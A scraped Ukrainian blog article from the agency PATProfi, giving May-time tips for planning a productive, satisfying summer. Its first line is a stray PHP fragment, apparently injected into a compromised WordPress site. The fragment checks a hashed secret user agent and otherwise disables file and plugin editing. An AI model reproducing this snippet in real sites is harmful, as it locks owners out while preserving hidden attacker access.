if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Що зробити в травні, щоб бути задоволеним у вересні у Києві, Україні за доступними цінами від агентства PATProfi

Що зробити в травні, щоб бути задоволеним у вересні

1 вересня – сумна дата: в цей день ми зазвичай усвідомлюємо, як багато не встигли за літо з того, про що мріяли, що планували і сподівалися зробити коли-небудь. Нехай в цьому році перший день осені буде чудовим! Ви підведете підсумки літа, посміхнетеся, погладите себе по «его» і, заряджені, натхненні і повні сил, емоцій, амбіцій, – підете перемагати осінь.

Ділимося порадами про те, що зробити в травні, щоб літо пройшло «на п’ятірку».

Сформулюйте реалістичні очікування

Влітку ви повні сил, природа розквітає, світанки надихають, і все виходить само собою … Ви напевно чули цю та іншу неправду. На ділі виявляється, що кількість годин у добі таке саме, спати хочеться так само (нехай і менше як зазвичай), роботу треба виконувати, а кількість сил залежить від багатьох змінних: правильного харчування, занять спортом, вміння зберігати баланс між особистим і робочим.

Крім того, влітку претендентів на ваш час стає більше: прогулянки, походи, зустрічі з друзями на свіжому повітрі, велосипеди, ролики, фестивалі, зірки, які стає видно … Загалом, необхідно реалістично поглянути на ситуацію і забути про «літні» міфи про суперменів і чудо-жінок, які на початку червня прокидаються в кожному з нас.

Замість необґрунтованих фантазій пропонуємо зробити наступне.

 1. Складіть список всього, що хочете встигнути за 92 дня літа. Зараз, в травні, – а не в 10-х числах червня.
 2. Відкладіть цей список у сторону на тиждень.
 3. Перегляньте його критично і в поганому настрої. Видаліть нереалістичні варіанти.
 4. Розкидайте завдання по календарю: завдяки візуальному поданню набагато помітніше, що ресурс часу обмежений.
 5. Знову приберіть зайве або «технічно» неможливе.

Займіться бізнес-плануванням

Життя – це проект. Кожне окреме літо – теж проект. Кожне завдання або мета на літо – міні-проект. Чому б не використати знання про проектний менеджмент, щоб досягати і встигати більше?

 1. Виділіть головні цілі зі списку, який ви склали. (Решта теж важливі, але обирайте лише ті, досягнення яких принесе вам на початку осені найбільше задоволення).
 2. Розкладіть кожну мету на етапи і підзадачі.
 3. Заплануйте кожен етап: терміни-дедлайни, необхідні ресурси, допомога з боку, можливі перешкоди, і як будете з ними справлятися.
 4. Визначте критерії успішності: за якими ознаками зрозумієте, що мета досягнута, завдання виконане – і можна переходити до наступних.
 5. Придумайте нагороду за досягнення мети (якщо це щось матеріальне, то краще і гроші на нього ще в травні відкласти). Або визначте, як будете «фіксувати» радість у моменті: фото, відео, скетч-замальовка, запис в щоденнику, інше.
 6. Заплануйте етапи перегляду цілей або підведення підсумків по кожній (коли, як і за яких обставин).

Слів багато, але при правильній кількості цілей (читайте: невеликому!) Не знадобиться багато часу на планування – зате в рази зростуть шанси, що все або відчутна частина вийде.

Складаючи плани на літо, плануйте емоції теж: просто обов’язковий список справ, які вас порадують, наприклад, зустріти світанок, з’їздити на літній фестиваль, або до моря, або на відпочинок за місто з рідними. Якщо все літо ви не будете «виринати» з робочої рутини – навіть супер досягнення не допоможуть відчути задоволення восени.

Заплануйте більше активності на свіжому повітрі

Якщо залишите для себе лазівку «можливість не виходити з дому», і навіть влітку нею скористаєтеся – то саме про це пошкодуєте восени, коли негода зачинить всіх по домівках і в офісі. Пройдіться очима за своїми планами і переконайтеся, що хоча б один день на тиждень ви будете проводити на свіжому повітрі. (А краще кожен, навіть якщо по годині!)

Виберіть навчальний курс або програму для розвитку кар’єри

Влітку вчитися лінь? Це стереотип зі шкільного минулого. Навпаки, влітку зручніше вчитися! Світловий день довший, вітаміну Д в організмі більше, голова працює краще – і за правильної організації навчального процесу ви відмінно підготуєтеся до осені, коли активізуються рекрутери, і відкриється багато вакансій мрії (зокрема і в компанії, де ви працюєте).

Для оптимальної організації навчального процесу вибирайте навчання онлайн: доступ до матеріалів 24/7, вебінари і уроки в запису, теорія, розбита на компактні інформаційні блоки, тестові завдання, які можна виконувати в хвилини пікової активності мозку, – все це спрощує навчання і дозволяє підлаштувати її під ваш графік, спосіб життя і професійні завдання.

Продумайте «плани Б»

На тлі пандемії, відкриття-закриття кордонів, введення карантинів і посилення захисних заходів то в одному, то в іншому регіоні – трапитися може всяке, наприклад, частина цілей стануть недосяжними. Але це не привід ставити хрест на літі! Тому заздалегідь подумайте, що може стати вдалою альтернативою головним цілям або допоможе вам легше змиритися з «відкладеної» мрією.

Помістіть плани перед очима (буквально)

Способи це зробити:

 • Запишіть плани на whiteboard або прикріпіть кнопками до коркової дошки.
 • Зробіть плакат або колаж і прикріпіть до стін робочого кабінету (або на холодильник на кухні).
 • Створіть шпалери з планами для робочого столу комп’ютера і / або фон з планами для екрану блокування на смартфоні. (Здивовані? Порахуйте, скільки разів за день ви берете в руки смартфон.)

Заведіть корисну звичку

Популярна порада щодо того, що варто заводити нові (корисні!) звички влітку. На ділі вам буде не до того. До того ж перший імпульс від звички допомагає зберігати мотивацію 2, максимум 3 тижні (наприклад, в травні), а ось влітку буде легше стояти на своєму, не здаватися. Загалом, чим раніше почнете – тим більше шансів, що звичка закріпиться. Що вибрати – вирішувати вам. Це може бути ранній підйом, медитація або 30 сторінок корисної книги щодня (список читання теж складіть в травні).

Ще кілька цеглинок до фундаменту продуктивного літа, що запам’ятається:

 • виберіть річний спорт, який вам подобається, і підготуйтеся до занять (екіпірування, трекери, тренер);
 • проведіть ревізію непотрібного – в тому числі морально застарілих завдань і проектів, цілей, які більше «не запалюють», сторінок і блогерів в соцмережах, які більше не цікаво читати, людей, які не роблять вас кращим;
 • підготуйте до літа автомобіль – він ваш головний помічник в організації літніх пригод (заміна масла, очищення фільтрів і радіатора, оцінка стану ременів і прокладок, лагодження кондиціонера, якщо взимку працював не ідеально, діагностика ходової, балансування коліс);
 • складіть список людей, з якими хочете побачитися за літо, щоб встановити, підтримати або зміцнити контакт (влітку простіше зустрічатися – наприклад, на прогулянці);
 • переглянете графік і рутини – в тому числі час підйому і відходу до сну; спробуйте підлаштувати їх під сонячну активність і літні можливості (наприклад, влітку можна гуляти пішки перед роботою або домовитися з керівником про продовження обіду на годину з подальшим продовженням робочого дня – щоб встигати займатися хобі, спортом або спілкуватися);

подумайте про оптимізацію робочого місця – важливо, щоб воно радувало і підвищувало продуктивність (в офісі можна поставити зволожувач повітря, міні-вентилятор і красиву пляшку води на безпечній від ноутбука відстані; дома – переїхати ближче до відмінних видів з вікна або навіть на балкон, спробувати стіл для роботи стоячи).

hosting.pat@gmail.com

Leave a Comment

Ваша e-mail адреса не оприлюднюватиметься.